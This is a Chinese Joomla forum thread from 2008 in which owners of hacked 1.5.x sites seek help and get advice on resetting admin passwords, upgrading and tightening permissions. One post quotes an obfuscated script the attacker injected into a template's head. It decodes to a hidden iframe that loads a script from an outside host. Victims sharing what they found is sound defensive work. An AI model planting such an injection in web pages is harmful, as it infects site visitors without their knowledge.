登录 注册

登录

问题 我们的网站被黑了,求助!

更多
2008年09月06日 09:13 #21 作者: Joomla之门
Joomla! 1.5.6 网站竟然被黑了?你的安全防护可能太差了,或许是你的服务器有缺陷。

罢了,现在赶紧恢复网站吧。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月06日 09:28 #22 作者: 火星漫步者
我我的管理员后台,有用.htaccess保护的。不过所有的目录的都是777权限的。昨天我昨天已经加了一些ip过滤,以及限制至能我的本地ip登陆。

专业周易起名改名: www.qimingz.com

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 10:18 #23 作者: bigguner
我的网站:www.yuanpeijiaoyu.com,被一个“GOOGLE投放的广告”的人劫持了,被修改了管理员名字或密码,请问哪位朋友救救我,非常感谢!
我是个新手,歌笑填鸭的那篇文章说进入phpmyadmin数据库,但是我连这个数据库都不知道从哪里进,有哪位大虾打救打救,感谢感谢!

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 10:36 #24 作者: 歌笑填鸭
你的网站服务器是那里的?
自己的?——这个最容易解决!
买的?phpmyadmin是一个数据库管理程序来的,基本上php空间都有安装这个程序!
一、找空间商要phpmyadmin的访问地址
二、cpanel空间,你可以进入你的cpanel管理地址,里面有phpmyadmin——cpanel是空间商提供的!
三、实在不行,可以自己上传一个phpmyadmin!——具体教程可以在网上搜索!
四、以上,如还搞不定,可找某些高手帮忙!

我的个人blog,欢迎大家交换链接:
歌笑填鸭‘S BLOG

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 10:49 #25 作者: ufonba
我估计你进到数据库还是有一定问题.争议把数据库的管理员表删除再导入备份的管理员表,才能把密码还原.但这样做是毫无意义的,它能够劫持你的网站,你把密码改回来,它还是能再次劫持的.比较好奇他是怎样劫持的.

这个 E-mail 受反垃圾邮件程序保护,您需要启用 JavaScript 才能查看。
文件附件:

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 12:17 #26 作者: bigguner
我能进入数据库了,不过按照填鸭的方法改了密码还是没办法进入后台管理,请问还有地方需要修改的吗?

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 12:48 #27 作者: 歌笑填鸭

我估计你进到数据库还是有一定问题.争议把数据库的管理员表删除再导入备份的管理员表,才能把密码还原.但这样做是毫无意义的,它能够劫持你的网站,你把密码改回来,它还是能再次劫持的.比较好奇他是怎样劫持的.


在学习中!!大学的时候就开始接触黑客这方面的
可是,到现在还是不精通!!!!

我的个人blog,欢迎大家交换链接:
歌笑填鸭‘S BLOG

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 13:10 #28 作者: bigguner
填鸭,您好,请问在数据库里改的密码是按自己实际需要还是可以按照您给的那种,对应的明码是怎么来的,按执行以后退出了数据库用刚改的密码还是不能进后台,是不是还要做些什么措施?麻烦您能跟我说说吗?感谢之至!

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月12日 18:25 #29 作者: ufonba
JOOMLA的安全性还算是比较高的.

这个 E-mail 受反垃圾邮件程序保护,您需要启用 JavaScript 才能查看。
文件附件:

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月23日 01:22 #30 作者: rmvbmaker
rmvbmaker 回复了话题: joomla 1.5.4 被入侵
发现网站被入侵,rhuk_milkyway 模板的 index.php 文件中 <head/> 部分被加入了下述代码:

<script language="javascript">
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%78%6F%6E%6C%69%6E%65%2E%65%6F%66%2E%68%75%2F%31%35%2F%6A%73%5F%67%6F%5F%66%31%2E%70%68%70%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
</script>

升级到 1.5.7 并手工删除上述代码后恢复正常。

admin 的 password 被人修改,自己修改数据库才改了回来。

不知道入侵是如何发生的,也不知道安全漏洞出在何处。这是我第一次遇到这种情况。

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年09月23日 07:54 #31 作者: Joomla之门
本站首页文章已经指出,Joomla! 1.5.7 是一次安全补丁升级。也就是说,之前任何版本都存在问题。

因此,再次强调:请所有 1.5.x 用户尽快升级到最新版本!


付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年10月22日 11:52 #32 作者: Evan
大部分的joomla网站黑客只是修改你的config.inc.php,或者在服务器的公共可写目录加入黑客链接页面,以此证明自己的能力持,倒是无意破坏全部数据(少量喜欢攻击数据库注入漏洞的例外哈),除了及时升级系统,建议及时备份好config.inc.php文件和系统数据库,并尽量减少全开放权限目录。

<a href=" www.egoclassic.cn ">伊歌.凯澜中国 - 这个 E-mail 受反垃圾邮件程序保护,您需要启用 JavaScript 才能查看。">Evan

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年12月14日 02:52 #33 作者: mjmyhmjmyh
网站被黑了两次,经查找
第一次是修改了模版Index.php
第二次是修改了根目录的Index.php

修改后文件Index.php全部文字如下
hacked by mustafa40229 for sivilharekat

他是怎么能够修改文件呢?求教解决方法..........

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年12月14日 08:40 #34 作者: Joomla之门
据说 Joomla! 1.5.8 以前的核心都有安全漏洞,我想黑客比你更清楚这一点。

如果你用的还是旧版核心,请尽快升级到最新版本;如果你已经用了 1.5.8,我怀疑他是通过服务器的漏洞入侵的,因为 J1.5.8 目前还没有听说发现安全漏洞。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2008年12月15日 19:51 #35 作者: warben
warben 回复了话题: 我的网站也被黑了
joomla 1.5 的, 有段时间没上去看了,刚一上去,傻眼了.还以为打错了网址.
这跟空间商关系大吗? 还是说仅仅是joomla的问题

登录 或者   注册一个会员帐号 来参与讨论